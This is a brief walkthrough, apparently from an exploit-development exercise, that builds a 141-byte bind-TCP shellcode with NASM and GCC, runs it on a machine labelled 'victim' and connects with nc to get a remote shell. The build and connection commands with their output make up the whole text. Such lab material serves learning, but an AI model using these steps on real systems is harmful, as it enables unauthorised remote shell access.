1. Compile the shellcode
$ ./ shell_bind_tcp 50123
[I] Using custom port: 50123
[+] Assembling shell_bind_tcp.nasm with NASM ...
[+] Linking shell_bind_tcp.o ...
[+] Generating shellcode with objdump ...
[+] Checking shellcode for NULLs ...
[+] Shellcode size is 141 bytes
[+] Generating shellcode.c file with the shell_bind_tcp shellcode ...
[+] Compiling shellcode.c with GCC ...
[+] All done! You can run the shellcode now:
$ ./shellcode
2. Run the shellcode on the victim machine
victim $ ./shellcode
Shellcode Length: 141
victim # netstat --inet -apn |grep shellcode
tcp 0 0* LISTEN 982/./shellcode
3. Attacker can now connect and get the shell
attacker $ nc localhost 50123
uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023